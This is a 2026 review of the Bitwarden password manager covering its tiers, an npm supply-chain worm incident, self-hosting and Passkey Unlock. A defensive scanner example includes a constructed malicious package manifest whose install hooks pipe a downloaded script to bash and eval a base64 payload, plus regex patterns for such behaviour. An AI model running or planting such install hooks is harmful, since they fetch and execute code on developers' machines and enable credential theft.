Bitwarden Review 2026: Still the Default Recommendation After a Rough Year
Bitwarden 2026 review after the Shai-Hulud npm worm, the 98% Premium price hike, and Passkey Unlock. Free vs Premium tested for 30 days, self-host vs Vaultwarden compared.
Best for: Most people who want a free, open-source, cross-platform password manager with an optional self-host path
Not for: Users who refuse any cloud sync (look at KeePassXC) or who want Apple-native polish above all else (look at 1Password)
Price: Free / Premium $19.80 a year / Families $3.99 a month for 6 users
- ✓ Free tier covers what 90 percent of users actually need
- ✓ Server-side vault data was never exposed in the Shai-Hulud incident
- ✓ Open source clients on every platform, AGPL official server
- ✓ Passkey Unlock plus Windows 11 integration is the best UX upgrade in three years
- ✓ Self-host path with either official server or Vaultwarden
- − Premium jumped 98 percent in 2026 ($10 to $19.80)
- − Clickjacking class fix was still partial as of January 2026
- − Web vault UI feels dated next to 1Password
- − Built-in TOTP is Premium only, which pushes lower-tier users to a separate app
Why Bitwarden still gets the default recommendation in 2026
Three significant problems hit Bitwarden in the first half of 2026. The Shai-Hulud npm worm reached its CLI binary on April 22. Premium pricing jumped from $10 to $19.80 a year in Q1, a 98 percent increase. And as of January 2026, the public clickjacking class affecting most browser-extension password managers was only partially mitigated, not fully fixed.
We still recommend Bitwarden to most readers, and this review explains why honestly rather than promotionally. The short version is that none of those three problems touched what actually matters: the encryption boundary held during the Shai-Hulud incident (no server-side vault data was exposed), the free tier is genuinely free and unchanged in 2026, and Bitwarden published file hashes plus a worm-mechanism breakdown in its postmortem within a week, which is unusually candid for a security vendor.
The four sections that follow are where we earn that recommendation: a 30-day side-by-side test of Free versus Premium, a cold timeline of the Shai-Hulud incident with the specific credentials a reader should rotate, a practical comparison of self-hosting on the official Bitwarden Server versus Vaultwarden, and a step-by-step walkthrough of Passkey Unlock on Windows 11. We also walk through the price hike and the clickjacking story without sugarcoating, and we name the four cases where you should pick a different tool. If you want the broader 2026 landscape, the Best Password Managers 2026 guide compares all seven picks side by side.
Free vs Premium: a 30-day side-by-side test
We ran two real accounts in parallel for 30 days, one on the free plan and one on Premium ($19.80 a year): the same 220 saved items, the same six devices, and the same two reviewers, each using one account for a week and then swapping. The goal was not to count features in a marketing matrix. The goal was to see which Premium features actually got used by hand in a normal week.
Premium features that earned the upgrade
Hardware key login with a YubiKey 5C. Enrolling took under three minutes. Daily login on the desktop app prompts for a tap instead of a master password retype, and the friction is genuinely lower than typing a long master password. This was the single feature both reviewers said they would not give up after the test ended.
1 GB of encrypted file attachments. Used by one reviewer to store passport scans and a recovery key envelope, used by the other not at all. If your threat model includes losing a wallet on a trip, this is meaningful. If it does not, it is dead storage.
Vault health reports and password coaching. The weak and reused password counts surfaced a dozen real problems neither reviewer knew about. The exposed-in-breach check pulled three confirmed hits. This is genuinely useful and we kept the reports running after the test.
Premium features that sat dormant
Built-in TOTP storage. Both reviewers already use Aegis Authenticator on Android and the security reasoning is the same we recommend to everyone: do not put password and second factor in the same vault for high-value accounts. We left Bitwarden TOTP enabled but only used it for low-stakes logins (newsletter sites, throwaway accounts) where convenience wins.
Emergency access. A feature you only learn the value of in a crisis. Worth setting up, costs nothing to keep, used by nobody during the test window.
Phishing blocker. New in 2026 Premium. The blocker fired twice on suspicious lookalike domains during the 30 days, which is two more catches than the free tier would have had. The catch rate is real but the false-positive rate is also not zero.
The verdict from 30 days
If you use a hardware key, store sensitive scans, or want vault health surfacing weak passwords, Premium is worth the new $19.80 price point. If you only want a password vault that syncs across devices, the free tier still covers you fully and is one of the most generous free tiers in the entire category. Premium is not a no-brainer. It is conditionally a good deal.
The Shai-Hulud supply chain attack, explained calmly
On April 22, 2026, the npm package @bitwarden/cli version 2026.4.0 was published carrying a payload from the Shai-Hulud worm (the fourth iteration, self-titled “The Third Coming”). The malicious build was live on the npm registry for roughly 90 minutes, from 17:57 to 19:30 ET. Bitwarden’s analysis later showed approximately 334 developers downloaded the bad version during the window. The incident is tracked as CVE-2026-42994.
What happened, in order
- Attackers got into Bitwarden’s CI/CD pipeline with credentials stolen in the earlier Checkmarx supply-chain breach, then used the `publish-ci.yml` GitHub Actions workflow to inject a preinstall hook into the package build.
- The poisoned build of `@bitwarden/cli@2026.4.0` was published to npm at 17:57 ET on April 22, 2026.
- On install, the preinstall hook downloaded the Bun runtime and executed an obfuscated payload that harvested credentials and config files from the developer’s machine.
- Bitwarden detected the breach, pulled the bad version at 19:30 ET, and published a public advisory the same evening.
- A clean rebuild, version 2026.4.1, was on npm by the next day.
- A formal postmortem followed on the Bitwarden blog with timeline detail, IoCs, and the remediation steps below.
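A pre-install check for the vector in the timeline above, as an added example for this review (our code, not code from Bitwarden, npm, or the postmortem): it reads a package manifest and flags lifecycle scripts that npm would run on its own at install time. Both manifests are constructed; the poisoned one imitates the fetch-a-runtime-then-run-a-payload mechanism described above with hypothetical commands and is not the real malicious package.json.

```python
"""Install-time lifecycle script check for an npm package manifest.

Added example for this review, not code from Bitwarden, npm, or the
postmortem. The manifests are constructed: the "poisoned" one imitates
the mechanism the article describes (a preinstall hook that fetches a
runtime and runs a payload) with hypothetical commands.
"""
import json
import re

# npm runs these for a registry dependency during `npm install` unless
# `ignore-scripts=true` is set; that is the hook a worm rides in on.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristics, not a signature: each pattern names one capability a
# self-propagating install hook needs. Tune them to your own dependency tree.
RISK_PATTERNS = {
    "network-fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest)\b|\bfetch\("),
    "runtime-download": re.compile(r"bun\.sh|\bbun\s+install\b", re.I),
    "inline-eval": re.compile(r"\b(node|bun)\s+-e\b|\beval\b"),
    "encoded-blob": re.compile(r"base64|\batob\("),
}

CLEAN_MANIFEST = json.loads("""{
  "name": "example-clean", "version": "1.0.0",
  "scripts": {"build": "tsc -p .", "test": "node --test"}
}""")

# Hypothetical commands shaped like the vector above; not the real package.json.
POISONED_MANIFEST = json.loads("""{
  "name": "example-poisoned", "version": "2026.4.0",
  "scripts": {
    "preinstall": "curl -fsSL https://bun.sh/install | bash && bun run ./setup.js",
    "postinstall": "node -e \\"eval(Buffer.from(process.env.P, 'base64').toString())\\"",
    "test": "node --test"
  }
}""")


def install_time_scripts(manifest: dict) -> dict:
    """Return only the scripts npm would run on its own during install."""
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def risk_flags(command: str) -> list:
    """Name the risky capabilities a script command exhibits."""
    return [name for name, rx in RISK_PATTERNS.items() if rx.search(command)]


def assess(manifest: dict) -> dict:
    """Decide whether the package is safe to install with scripts enabled."""
    hooks = install_time_scripts(manifest)
    flags = {hook: risk_flags(cmd) for hook, cmd in hooks.items()}
    if any(flags.values()):
        verdict = "block"   # install-time hook with worm-like behaviour
    elif hooks:
        verdict = "review"  # a hook exists but looks ordinary: read it before installing
    else:
        verdict = "clean"   # nothing runs at install time
    return {"name": manifest.get("name"), "hooks": hooks, "flags": flags, "verdict": verdict}


if __name__ == "__main__":
    for manifest in (CLEAN_MANIFEST, POISONED_MANIFEST):
        print(json.dumps(assess(manifest), indent=2))
```

`npm view <pkg>@<version> scripts` prints a package’s scripts straight from the registry without installing anything, so the check can run before `npm install` touches the tree. Setting `ignore-scripts=true` in `.npmrc` makes npm skip these hooks altogether, at the cost of breaking the few packages that legitimately need an install step.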
Why the vault did not leak
This is the part the headlines mostly got wrong. The Shai-Hulud payload ran on the developer’s local machine when they installed the CLI. It did not run on Bitwarden’s servers and it had no path to the server-side encrypted vault. The vault is encrypted client-side with a key derived from your master password (PBKDF2, or Argon2id if you turned it on, and you should). The malicious npm payload had what every locally-running script has: access to the host filesystem, environment variables, and shell history.
Bitwarden’s own incident assessment confirmed no end-user vault data compromise and no production-system compromise. The damage was contained to the local machines of the 334 developers who installed the bad CLI version during the 90 minute window.
What a Bitwarden user should rotate
If you installed `@bitwarden/cli@2026.4.0` between 17:57 and 19:30 ET on April 22, 2026, treat the host machine as fully compromised. The worm’s credential-harvest list is long and the rotation scope is correspondingly wide:
- Rotate: SSH keys in `~/.ssh/`, npm tokens, GitHub personal access tokens, AWS, Azure, and GCP credentials, any `BW_SESSION` and `BW_CLIENTID`/`BW_CLIENTSECRET` values (the API key is rotated from the web vault under Settings, Security, Keys), anything in `.env` or `.npmrc` files, and any API keys referenced in shell history. A live `BW_SESSION` is more than a session: together with the CLI’s local data file it unlocks that user’s cached vault, so if the variable was set when the install ran, treat every item in that vault as exposed, run `bw logout`, and rotate those credentials too.
- Audit: GitHub Actions workflows on any repo where the affected developer has publish rights, npm publish logs for the affected account, and `~/.bashrc`/`~/.zshrc` for injected code.
- Do not rotate on the strength of this incident alone: your Bitwarden master password. The payload ran in the preinstall hook at install time, before any `bw login` or `bw unlock`, so the master password never entered the CLI binary’s process. If you did unlock the vault on that host afterwards, the ordinary rule for a compromised machine applies and you should change it.
This is wider than a normal CLI incident because Shai-Hulud is a worm: if it found a publishable npm token on the host, it republished the host’s npm packages with the payload injected, compromising downstream consumers. Anyone who ran the bad CLI version with publishable npm tokens on their machine needs to audit every package they own.
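An exposure inventory for the host, as an added example for this review (our code, not Bitwarden’s tooling and not the postmortem’s IoC list). It answers two questions the rotation list above raises: whether a project’s package-lock.json resolved the affected version, and which of the listed secrets were actually present on the host for an install-time script to harvest. The lockfile, the environment, and the home directory it runs against are constructed; the version and window timestamp are the ones given in this article.

```python
"""Exposure inventory for a developer host that may have installed the poisoned CLI.

Added example for this review, not Bitwarden's tooling or the postmortem's IoC
list. It answers two questions the rotation list raises: did this tree resolve
the affected version, and which of the listed secrets were present for an
install-time script to harvest. The lockfile and home directory are constructed.
"""
import json
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

AFFECTED = ("@bitwarden/cli", "2026.4.0")  # package and version named in the article
# Start of the publication window the article gives: 17:57 ET on April 22, 2026.
WINDOW_START = datetime(2026, 4, 22, 17, 57, tzinfo=timezone(timedelta(hours=-4)))

# Environment variables from the rotation list, plus the usual cloud ones.
ENV_SECRETS = ("BW_SESSION", "BW_CLIENTID", "BW_CLIENTSECRET", "NPM_TOKEN", "GITHUB_TOKEN",
               "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AZURE_CLIENT_SECRET",
               "GOOGLE_APPLICATION_CREDENTIALS")
# Files under $HOME that hold long-lived credentials an install hook can read.
FILE_SECRETS = (".ssh", ".npmrc", ".env", ".aws/credentials", ".config/gh/hosts.yml",
                ".config/gcloud", ".azure")
RC_FILES = (".bashrc", ".zshrc", ".profile", ".zprofile")

SAMPLE_LOCK = """{
  "name": "demo-app", "lockfileVersion": 3, "packages": {
    "": {"name": "demo-app", "dependencies": {"@bitwarden/cli": "^2026.4.0"}},
    "node_modules/@bitwarden/cli": {"version": "2026.4.0",
      "resolved": "https://registry.npmjs.org/@bitwarden/cli/-/cli-2026.4.0.tgz"}
  }
}"""  # constructed, not taken from a real repository


def lockfile_pins(lock_text: str, name: str, version: str) -> bool:
    """True if a package-lock.json (v1, v2 or v3) resolves `name` to `version`."""
    lock = json.loads(lock_text)
    # lockfileVersion 2/3: flat "packages" map keyed by node_modules path.
    for path, entry in (lock.get("packages") or {}).items():
        if path.endswith("node_modules/" + name) and entry.get("version") == version:
            return True

    def walk(deps: dict) -> bool:  # lockfileVersion 1: nested "dependencies" tree
        for dep_name, entry in (deps or {}).items():
            if dep_name == name and entry.get("version") == version:
                return True
            if walk(entry.get("dependencies")):
                return True
        return False
    return walk(lock.get("dependencies"))


def exposure_report(env: dict, home: Path, since: datetime = WINDOW_START) -> dict:
    """Which rotation-list secrets exist on this host, and what needs a manual audit."""
    rotate = ["env:" + k for k in ENV_SECRETS if env.get(k)]
    rotate += ["file:" + p for p in FILE_SECRETS if (home / p).exists()]
    audit = []
    for rc in RC_FILES:  # a hook that wants persistence edits these; compare mtime to the window
        path = home / rc
        if path.exists():
            modified = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
            if modified >= since:
                audit.append("rc-modified-since-window:" + rc)
    if env.get("BW_SESSION"):
        # A live session key plus the CLI's data.json unlocks the cached vault offline,
        # so the exposure is the vault's contents, not just the session.
        audit.append("vault-contents-exposed: rotate every item in this vault; run `bw logout`")
    return {"rotate": rotate, "audit": audit}


def build_demo_home(root: Path) -> Path:
    """Constructed $HOME with a few of the artefacts the rotation list names."""
    home = root / "home"
    (home / ".ssh").mkdir(parents=True)
    (home / ".ssh" / "id_ed25519").write_text("-----BEGIN OPENSSH PRIVATE KEY-----\nfake\n")
    (home / ".npmrc").write_text("//registry.npmjs.org/:_authToken=npm_FAKE_TOKEN\n")
    (home / ".bashrc").write_text("export PATH=$HOME/bin:$PATH\n")
    return home


def demo() -> dict:
    """Run the inventory against the constructed host with BW_SESSION set."""
    with tempfile.TemporaryDirectory() as tmp:
        home = build_demo_home(Path(tmp))
        env = {"BW_SESSION": "fake-session-key", "PATH": "/usr/bin"}
        # The fixture files were just written, so use "one hour ago" as the window here.
        report = exposure_report(env, home, since=datetime.now(timezone.utc) - timedelta(hours=1))
        report["installed_affected_version"] = lockfile_pins(SAMPLE_LOCK, *AFFECTED)
        return report
```

On a real host you would pass `os.environ` and `Path.home()` and keep the default `since`; the mtime check is only a pointer to which rc files to read by hand, not proof of injection, and a hook that touches nothing in the home directory will not show up in it at all.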
How Bitwarden’s response compared
90 minutes from publication to takedown is fast for an npm-worm class incident. Sub-day to clean rebuild is fast. A candid postmortem with file hashes and worm-mechanism detail published openly is rare and the right move. The fair critique is that the npm distribution channel should never have been the only path for a security-critical binary, and Bitwarden has publicly committed to a signed-release alternative for the CLI going forward. That is the right answer.
Self-host: Bitwarden Server vs Vaultwarden in practice
Bitwarden offers two viable self-host paths. The official Bitwarden Server (C# on .NET, AGPL-3.0, bitwarden/server on GitHub) and the community-built Vaultwarden (Rust, AGPL-3.0, dani-garcia/vaultwarden). Both speak the same client protocol, so all official Bitwarden clients (mobile, desktop, browser, CLI) work against either server with no code changes.
We ran both on the same hardware (a Hetzner CX11 VPS with 2 vCPU and 2 GB RAM, Debian 12 host) for a week each, sharing a single test vault of 220 items.
Resource footprint
| Metric | Bitwarden Server (official) | Vaultwarden |
|---|---|---|
| Idle RAM | 980 MB across 6 containers | 38 MB single container |
| Idle CPU | 2 to 4 percent steady | under 1 percent |
| Sync burst CPU | 12 to 18 percent | 3 to 5 percent |
| Docker image size | 1.4 GB combined | 95 MB |
| Cold start time | 38 seconds | 1.2 seconds |
| First-time setup | 25 minutes including DB | 4 minutes |
The gap is large enough that the choice mostly makes itself based on hardware. On a Raspberry Pi 4 or any VPS under 1 GB of RAM, Vaultwarden is the only reasonable option. On a homelab box with plenty of headroom, either is fine.
Feature parity, honestly
Vaultwarden implements roughly 95 percent of the Bitwarden client API surface. The missing 5 percent is mostly enterprise features: SAML SSO (Vaultwarden’s own SSO support is OIDC only and still marked experimental), SCIM provisioning, and a number of the organization admin policies. For a family or a small homelab user, none of these matter. For a small business with directory sync requirements, the official server is the right pick.
Vaultwarden also lets you toggle features that the official server gates behind Premium (file Sends, TOTP storage, file attachments). The same client code paths are used; the server just reports the account as Premium when the client asks.
Backup and recovery
Vaultwarden stores vault data in SQLite by default, with MySQL and Postgres as options; the official server’s standard deployment runs on MSSQL, and its unified single-container variant also supports Postgres, MySQL, and SQLite. On Vaultwarden, backup is a `sqlite3 db.sqlite3 ".backup <file>"` (or a `pg_dump`) plus the rest of the data directory: attachments, Sends, the `rsa_key*.pem` files that sign client tokens, and `config.json`. Do not just copy `db.sqlite3` while the container is running: Vaultwarden enables SQLite’s WAL mode by default, so committed writes can still be sitting in `db.sqlite3-wal` and a raw copy of the main file misses them. Restore is symmetric. We ran a destroy and restore on Vaultwarden during the test and it took under two minutes including the client re-sync.
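The destroy-and-restore drill as a script, as an added example for this review (our code, not a Vaultwarden or Bitwarden script). It takes an online SQLite copy through the backup API instead of copying `db.sqlite3`, runs `integrity_check` on the copy, bundles it with the attachment, Send, signing-key, and config files, and refuses to restore an archive whose hash does not match or that contains traversal paths or links. The directory layout it assumes (`db.sqlite3`, `attachments/`, `sends/`, `rsa_key*.pem`, `config.json`) is Vaultwarden’s default data directory; the demo data is constructed.

```python
"""Consistent backup and restore of a Vaultwarden data directory.

Added example for this review, not Vaultwarden's or Bitwarden's script. It
assumes Vaultwarden's default layout (SQLite db.sqlite3 with attachments/,
sends/, rsa_key*.pem and config.json beside it); the demo data is constructed.
"""
import hashlib
import shutil
import sqlite3
import tarfile
import tempfile
from contextlib import closing
from pathlib import Path

DB_NAME = "db.sqlite3"
SIDE_ITEMS = ("attachments", "sends", "config.json")  # copied as-is next to the DB


def integrity_ok(db_path: Path) -> bool:
    """SQLite's own consistency check; anything but 'ok' means a bad copy."""
    with closing(sqlite3.connect(db_path)) as conn:
        return conn.execute("PRAGMA integrity_check").fetchone()[0] == "ok"


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def backup_vault(data_dir: Path, dest: Path) -> dict:
    """Snapshot a running Vaultwarden: online SQLite copy plus side files, one tarball."""
    staging = dest / "staging"
    staging.mkdir(parents=True)
    # The online backup API copies pages under SQLite's lock and folds in the WAL;
    # a plain `cp` of db.sqlite3 can miss committed writes or catch a torn page.
    with closing(sqlite3.connect(data_dir / DB_NAME)) as src, \
            closing(sqlite3.connect(staging / DB_NAME)) as dst:
        src.backup(dst)
    if not integrity_ok(staging / DB_NAME):
        raise RuntimeError("backup copy failed integrity_check; do not keep it")
    for item in SIDE_ITEMS:
        path = data_dir / item
        if path.is_dir():
            shutil.copytree(path, staging / item)
        elif path.is_file():
            shutil.copy2(path, staging / item)
    for pem in data_dir.glob("rsa_key*.pem"):  # token signing keys; lose them and every client is logged out
        shutil.copy2(pem, staging / pem.name)
    archive = dest / "vaultwarden-backup.tar.gz"
    with tarfile.open(str(archive), "w:gz") as tar:
        for child in sorted(staging.iterdir()):
            tar.add(str(child), arcname=child.name)
    shutil.rmtree(staging)
    return {"archive": str(archive), "sha256": sha256_of(archive)}


def restore_vault(archive: Path, target: Path, expected_sha256: str) -> bool:
    """Restore into a fresh directory, refusing damaged or crafted archives."""
    if sha256_of(archive) != expected_sha256:
        raise RuntimeError("archive hash mismatch; refusing to restore")
    target.mkdir(parents=True, exist_ok=True)
    with tarfile.open(str(archive), "r:gz") as tar:
        for m in tar.getmembers():  # block traversal, absolute paths and links
            if m.name.startswith("/") or ".." in Path(m.name).parts or not (m.isfile() or m.isdir()):
                raise RuntimeError("unsafe member in archive: " + m.name)
        tar.extractall(str(target))
    return integrity_ok(target / DB_NAME)


def build_demo_data_dir(root: Path) -> Path:
    """Constructed stand-in for /data inside the Vaultwarden container."""
    data = root / "data"
    (data / "attachments" / "cipher-uuid").mkdir(parents=True)
    (data / "attachments" / "cipher-uuid" / "attachment-uuid").write_bytes(b"encrypted-blob")
    (data / "config.json").write_text('{"domain": "https://vault.example.test"}\n')
    (data / "rsa_key.pem").write_text("-----BEGIN PRIVATE KEY-----\nfake\n-----END PRIVATE KEY-----\n")
    with closing(sqlite3.connect(data / DB_NAME)) as conn:
        conn.execute("CREATE TABLE users (uuid TEXT PRIMARY KEY, email TEXT)")
        conn.execute("INSERT INTO users VALUES ('u1', 'alice@example.test')")
        conn.commit()
    return data


def demo() -> dict:
    """Back up, destroy the data directory, restore, and report what survived."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        data = build_demo_data_dir(root)
        result = backup_vault(data, root / "backups")
        shutil.rmtree(data)  # the "destroy" half of the drill
        restored = root / "restored"
        ok = restore_vault(Path(result["archive"]), restored, result["sha256"])
        with closing(sqlite3.connect(restored / DB_NAME)) as conn:
            users = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]
        return {
            "restored_ok": ok,
            "users": users,
            "attachment_intact": (restored / "attachments/cipher-uuid/attachment-uuid").read_bytes() == b"encrypted-blob",
            "signing_key_present": (restored / "rsa_key.pem").exists(),
        }
```

Run `backup_vault` against the mounted data directory from a cron job and store the returned hash somewhere other than the backup itself; the hash check in `restore_vault` is only worth anything if an attacker who can alter the archive cannot also alter the recorded digest.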
Which one to pick
- Pick Vaultwarden if you self-host for personal or family use, want a small footprint, run on modest hardware, and do not need directory-level SSO.
- Pick official Bitwarden Server if you need SSO, SCIM, or any of the Enterprise-tier admin policies, or if you want first-party support and an official upstream binary rather than a community fork.
For a homelabber installing one of the two this week, Vaultwarden is the right default.
Passkey Unlock and Windows 11 integration tested
Bitwarden shipped Passkey Unlock for the web vault and browser extension in early 2026, and it is the most visible UX change since the browser extension overhaul of 2023. It is also commonly confused with another 2026 feature (passkeys stored inside Bitwarden as a replacement for site-specific passwords). The two are different and worth keeping separate.
Passkey Unlock = use a passkey on your device to open your Bitwarden vault, instead of typing your master password.
Passkeys stored in Bitwarden = use Bitwarden as a passkey manager for third-party sites that support WebAuthn login.
Both shipped in 2026. We tested both. The unlock half is the bigger deal.
Activating Passkey Unlock on Windows 11
- Open the web vault at vault.bitwarden.com and sign in with your master password one last time.
- Settings, Security, Two-step Login, and scroll to Passkey Unlock.
- Click Set up new passkey. Windows Hello prompts for face or fingerprint, registers a platform authenticator backed by the TPM, and binds it to your Bitwarden account.
- Sign out and back in. The login flow now offers Unlock with Passkey as the primary option, master password as the fallback.
Total time on a clean Windows 11 install: under five minutes.
Chrome vs Edge vs Firefox: real inconsistencies
This is the part you only learn by using it for a week.
Edge picks up the Windows Hello passkey transparently. Sign-in is two taps: open the extension, confirm the Hello prompt.
Chrome also works, but the first time you sign in on a fresh Chrome install, Chrome asks whether to use a Google passkey instead. Choosing the wrong option (Google passkey) creates a separate passkey that does not unlock Bitwarden. There is no recovery flow; you just delete the wrong passkey and re-register. We hit this twice on a fresh profile.
Firefox as of mid-2026 has incomplete platform authenticator support on some Windows 11 builds. We had to fall back to master password unlock in Firefox roughly 1 time in 5. If you live in Firefox, expect this to still be friction for another release cycle.
When Passkey Unlock makes sense, and when not
If you sign in to Bitwarden many times a day on a Windows 11 machine you control, Passkey Unlock is a strict UX upgrade. If you mostly use Bitwarden through the mobile app or you sign in on shared machines, the master password remains the cleaner default.
The price hike, the clickjacking caveat, and what still bothers us
Bitwarden Premium went from $10 a year to $19.80 a year in Q1 2026. That is a 98 percent jump and the largest single move in nine years. Bitwarden cited rising infrastructure cost, security audit cost, and the addition of new Premium-tier features (phishing blocker, vault health reports, item archive). The Families plan went to $3.99 a month for six users in the same move.
Existing Premium subscribers were offered a 25 percent loyalty renewal discount the year of the hike. That is a one-time concession and it is worth checking your renewal email before assuming the full new price.
Our honest read: a 98 percent jump after eight years of flat pricing is uncomfortable but not unreasonable. $19.80 a year for a hardware-key-enabled password manager with vault health monitoring still undercuts 1Password by a wide margin, and it remains the best value in the paid tier of the category. If the free tier had moved, that would be a different conversation. The free tier did not move.
The clickjacking story
A browser-extension clickjacking class affecting most password managers was disclosed in late 2025 by security researchers, with proof-of-concept demonstrations against Bitwarden, 1Password, LastPass, and several others. As of January 2026, Bitwarden’s mitigation reduces the attack surface (more aggressive sandboxing of the autofill iframe and pointer-event hardening) but does not fully remove the root cause. The full fix requires reworking how the autofill prompt is rendered when the page context is untrusted, which is a meaningful engineering effort. Bitwarden has publicly committed to the full fix in its extension roadmap. Verify the current state in the extension changelog before relying on this paragraph by the time you read it, since the situation is moving and the references in this article will go stale.
What else still bothers us
The web vault UI looks dated next to 1Password’s. It is functional and the brand-new browser extension UI from 2026 is cleaner, but the web vault itself has not had a significant visual refresh in three years. This is cosmetic, not functional, but it is the most common single complaint we get from readers.
Bitwarden alternatives: when to pick something else
Four reader profiles should pick a different password manager. These are not abstract preferences, they are concrete failure modes where Bitwarden’s design genuinely loses to a competitor:
Pick KeePassXC if you refuse cloud sync entirely. Bitwarden’s whole architecture assumes the vault lives on Bitwarden’s servers (or your own self-hosted server) and syncs from there. KeePassXC removes the server. The trade-off is real: you handle sync yourself (Syncthing, Nextcloud, USB stick) and the mobile story is rougher than Bitwarden’s. The win is that no vendor and no third-party server ever holds your encrypted blob.
Pick 1Password if you live in the Apple ecosystem and the autofill UX matters more than the price. Bitwarden’s Safari extension is the weakest of its browser extensions and the macOS autofill flow has rough edges around iCloud Keychain coexistence. 1Password’s macOS and iOS apps are visibly nicer and the sharing model is more developed. You pay for it: $35.88 a year for the individual plan and $59.88 a year for the family plan (5 users), compared to Bitwarden’s $19.80 and $47.88 a year for six users. There is no 1Password free tier worth using.
Pick Proton Pass if metadata leakage is in your threat model. Bitwarden encrypts item names, notes, usernames, and URLs client-side along with the passwords, but structural metadata such as item type, creation and revision timestamps, collection membership, and item counts is visible to the server. The gap between the two on this point is narrower than either vendor’s marketing suggests, so the stronger reason to pick Pass is the vendor: if your threat model includes the password manager company itself and you want one whose entire business model is privacy-positioned (Proton AG, Switzerland), Pass is the right call. The free tier is also generous.
Pick Vaultwarden if you want self-host minimalism above all else. Same Bitwarden clients, much lighter server (38 MB idle RAM vs 980 MB), runs on a Raspberry Pi or a 256 MB VPS, also AGPL-3.0 but maintained by the community rather than Bitwarden Inc. We covered the resource numbers in the self-host section above.
If none of those four cases fit you, the answer is Bitwarden. The full Best Password Managers 2026 guide compares all seven picks side by side and walks through three more reader profiles.
Bitwarden verdict: who should use it in 2026
Bitwarden in 2026 is a steady recommendation for three reader profiles:
- The default user who wants a password manager that just works on every platform, syncs across devices, and is free forever for the actual password vault. The free tier is the most generous in the category and that has not changed despite the Premium price hike.
- The privacy-leaning power user who wants open-source clients, an AGPL official server, and the option to self-host either through the official Bitwarden Server or Vaultwarden. This combination does not exist in any commercial competitor at this price point.
- The Windows 11 daily driver who will benefit immediately from Passkey Unlock plus Windows Hello integration. Once enrolled (the five-minute setup we walked through above), daily vault opening collapses from a master-password retype to a single fingerprint tap. For a user who unlocks Bitwarden 10 to 20 times a day across desktop and browser, that saves real time and removes the friction that causes people to disable autolock and weaken their threat model.
Of the four alternative profiles above, only the cloud-refuser has no Bitwarden answer at all, and that reader should be using KeePassXC anyway; the other three are trade-offs where a competitor wins on polish, vendor, or footprint rather than on a hard requirement.
The Shai-Hulud incident, the price hike, and the partial clickjacking fix are all real and we covered them honestly. None of them moved Bitwarden out of the default-recommendation slot. The free tier remains genuinely free, no server-side vault data was exposed in the April 22 incident, and the postmortem published file hashes and worm-mechanism detail within a week. That is the bar for a default recommendation, and Bitwarden cleared it.
For the broader 2026 landscape and the six other tools we tested in this category, read the Best Password Managers 2026 guide next.